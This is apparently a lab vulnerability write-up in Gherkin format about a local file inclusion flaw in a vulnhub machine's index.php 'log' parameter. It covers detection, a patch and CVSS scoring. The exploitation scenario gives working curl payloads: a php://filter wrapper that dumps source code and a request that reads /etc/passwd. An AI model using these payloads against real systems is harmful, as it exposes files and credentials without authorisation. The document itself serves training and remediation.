## Version 1.4.1
## language: en

Feature:
  TOE:
    vulnhub
  Location:
    http://192.168.1.73/index.php - log (field)
  CWE:
    CWE-22: Improper Limitation of a Pathname to a Restricted Directory
    ('Path Traversal')
  Rule:
    REQ.037: R037. Parameters without sensitive data
  Goal:
    Get access to unintended resources
  Recommendation:
    Implement a white list

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.08.01  |
    | Firefox         | 79.0        |
    | Virtualbox      | 6.1         |
    | Curl            | 7.71.1      |
  TOE information:
    Given I am accessing the site at 192.168.1.73
    And it runs on virtualbox

  Scenario: Normal use case
    Given I access the site at
    """
    http://192.168.1.73/
    """
    And the page let me make a ping to a site [evidence](ping.png)
    When I ping a host
    Then I can see the page redirects me to
    """
    http://192.168.1.73/index.php?log=logs/<IP>.log
    """
    And "<IP>" is the ip from which I'm accessing the site

  Scenario: Static detection
    Given I access the code at "index.php"
    """
    ...
    46  <?php
    47    if (isset($_GET['log']))
    48    {
    49      include ($_GET['log']);
    50    }
    51  ?>
    ...
    """
    And I can see that the parameter "log" is not validated
    And I can conclude the site is vulnerable to LFI

  Scenario: Dynamic detection
    Given after the ping I see that the page redirects me to
    """
    http://192.168.1.73/index.php?log=logs/my_ip.log
    """
    When I try to include "index.php" using "curl"
    """
    $ curl -XGET http://192.168.1.73/index.php?log=index.php
    """
    Then I get a loop [evidence](loop.png)
    And I can conclude that the site is vulnerable to LFI

  Scenario: Exploitation
    Given that the site is vulnerable to LFI
    When I try using php filters to see the index's source code
    """
    $ curl -XGET http://192.168.1.73/index.php?log=php://filter/\
      convert.base64-encode/resource=index.php
    """
    Then I get index's code in base64 [evidence](base64.png)
    When I go to
    """
    curl -XGET http://192.168.1.73/index.php?log=/etc/passwd
    """
    Then I get the content of "/etc/passwd" [evidence](passwd.png)
    And I can conclude that I can exploit the LFI

  Scenario: Remediation
    Given I have patched the code by adding
    """
    46  <?php
    47    if (isset($_GET['log'])) {
    48      $log = $_GET['log'];
    49      if (!(basename(dirname($log)) === "logs")) {
    50        header('Location: /');
    51        exit;
    52      } else {
    53        include ($_GET['log']);
    54      }
    55    }
    56  ?>
    """
    And line 49 only allows to include files only under "logs" folder
    When I try to read "/etc/passwd"
    """
    $ curl -XGET http://192.168.1.73/index.php?log=/etc/passwd
    """
    Then I get nothing [evidence](fixed.png)
    And I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.8 (Medium) - AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    5.6 (Medium) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    5.6 (Medium) - MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:L/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date {2020-08-19}
